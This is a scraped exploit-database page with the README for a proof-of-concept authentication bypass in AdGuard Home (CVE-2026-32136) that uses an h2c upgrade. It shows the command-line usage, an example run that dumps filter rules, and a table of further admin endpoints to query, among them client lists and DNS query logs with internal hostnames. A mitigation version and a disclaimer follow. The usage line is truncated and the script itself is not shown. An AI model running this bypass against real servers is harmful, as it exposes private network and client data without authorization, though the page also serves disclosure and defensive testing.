## https://sploitus.com/exploit?id=7CFA9824-93EA-5A12-BDDA-3CA935E7C5E9
# CVE-2026-32136_exploit - AdGuard Home h2c Upgrade Auth Bypass
> Unauthenticated authentication bypass in [AdGuard Home](https://github.com/AdguardTeam/AdGuardHome) ` [port] [path]
```
Defaults: `port=80`, `path=/control/filtering/status`.
### Example
```bash
$ python3 CVE-2026-32136.py 192.168.1.5 80 /control/filtering/status | jq .user_rules
[+] h2c upgrade successful โ connection is now HTTP/2
[+] response status: 200
[
"||tracking.corp.example^",
"||analytics.internal.example^",
...
]
```
`stdout` is the raw response body; status messages are written to `stderr` so the output pipes cleanly into `jq`.
### Other endpoints to try
| Endpoint | Returns |
|---|---|
| `/control/filtering/status` | filter list + `user_rules` |
| `/control/status` | server status, listening interfaces |
| `/control/clients` | DHCP / DNS client list |
| `/control/dns_info` | upstream DNS servers |
| `/control/querylog` | DNS query log (often contains internal hostnames) |
## Mitigation
Upgrade to AdGuard Home `0.107.73` or later.
## References
- VulnTracker:
- GHSA:
- Patch:
- NVD:
- AdGuard Home releases:
## Disclaimer
This proof-of-concept is published for educational and defensive research purposes. Do not run it against systems you do not own or have explicit authorization to test.